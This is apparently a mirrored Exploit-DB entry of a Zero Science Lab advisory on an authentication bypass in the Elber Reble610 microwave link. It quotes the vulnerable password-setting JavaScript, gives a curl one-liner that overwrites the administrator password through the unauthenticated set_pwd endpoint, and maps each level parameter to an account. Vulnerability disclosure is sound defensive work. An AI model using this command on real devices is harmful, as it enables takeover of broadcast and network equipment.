b8a68091fe
7 changes to exploits/shellcodes/ghdb Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 - Authentication Bypass Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link - Authentication Bypass Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link - Device Config Disclosure Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 - Authentication Bypass Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 - Device Config Disclosure Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 - Device Config Disclosure
69 lines
No EOL
2.4 KiB
Text
69 lines
No EOL
2.4 KiB
Text
Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link Authentication Bypass
|
|
|
|
|
|
Vendor: Elber S.r.l.
|
|
Product web page: https://www.elber.it
|
|
Affected version: 0.01 Revision 0
|
|
|
|
Summary: The REBLE610 features an accurate hardware design, absence of
|
|
internal cabling and full modularity. The unit is composed by a basic
|
|
chassis with 4 extractable boards which makes maintenance and critical
|
|
operations, like frequency modification, easy and efficient. The modular
|
|
approach has brought to the development of the digital processing module
|
|
(containing modulator, demodulator and data interface) and the RF module
|
|
(containing Transmitter, Receiver and channel filters). From an RF point
|
|
of view, the new transmission circuitry is able to guarantee around 1 Watt
|
|
with every modulation scheme, introducing, in addition, wideband precorrection
|
|
(up to 1GHz depending on frequency band).
|
|
|
|
Desc: The device suffers from an authentication bypass vulnerability through
|
|
a direct and unauthorized access to the password management functionality. The
|
|
issue allows attackers to bypass authentication by manipulating the set_pwd
|
|
endpoint that enables them to overwrite the password of any user within the
|
|
system. This grants unauthorized and administrative access to protected areas
|
|
of the application compromising the device's system security.
|
|
|
|
--------------------------------------------------------------------------
|
|
/modules/pwd.html
|
|
------------------
|
|
50: function apply_pwd(level, pwd)
|
|
51: {
|
|
52: $.get("json_data/set_pwd", {lev:level, pass:pwd},
|
|
53: function(data){
|
|
54: //$.alert({title:'Operation',text:data});
|
|
55: show_message(data);
|
|
56: }).fail(function(error){
|
|
57: show_message('Error ' + error.status, 'error');
|
|
58: });
|
|
59: }
|
|
|
|
--------------------------------------------------------------------------
|
|
|
|
Tested on: NBFM Controller
|
|
embOS/IP
|
|
|
|
|
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2024-5818
|
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5818.php
|
|
|
|
|
|
18.08.2023
|
|
|
|
--
|
|
|
|
|
|
$ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234
|
|
|
|
Ref (lev param):
|
|
|
|
Level 7 = SNMP Write Community (snmp_write_pwd)
|
|
Level 6 = SNMP Read Community (snmp_read_pwd)
|
|
Level 5 = Custom Password? hidden. (custom_pwd)
|
|
Level 4 = Display Password (display_pwd)?
|
|
Level 2 = Administrator Password (admin_pwd)
|
|
Level 1 = Super User Password (puser_pwd)
|
|
Level 0 = User Password (user_pwd) |